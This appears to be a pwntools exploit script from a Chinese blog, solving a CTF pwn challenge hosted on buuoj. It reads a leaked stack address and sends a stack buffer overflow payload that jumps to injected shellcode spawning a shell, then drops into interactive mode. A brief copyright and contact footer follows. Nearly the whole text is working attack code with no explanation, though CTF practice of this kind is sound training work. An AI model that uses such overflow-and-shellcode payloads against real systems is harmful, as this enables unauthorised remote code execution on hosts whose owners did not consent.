from pwn import *
context(arch='i386', os='linux', log_level='debug')
io = connect('node5.buuoj.cn',25977 )
offset = 0x16 + 0x04 - 0x08
vuln_addr = 0x08048603
elf = ELF("./pwn")
io.recvuntil(b'Yippie, lets crash: ')
s_addr = int(io.recvline().strip(),16)
print(hex(s_addr))
shellcode=asm(shellcraft.sh())
io.recvline()
io.recvuntil(b'> ')
payload=b'crashme\x00'
payload += b'a' * offset + p32(s_addr - 0x1c) + shellcode
io.sendline(payload)
io.interactive()
版权
QQ:3362192260
要拿啥吱一声拿走就行了
有些文章里的部分内容或者有些文章是摘别的作者的。早期的一些可能没留出处。有侵权联系上面那个 qq。
评论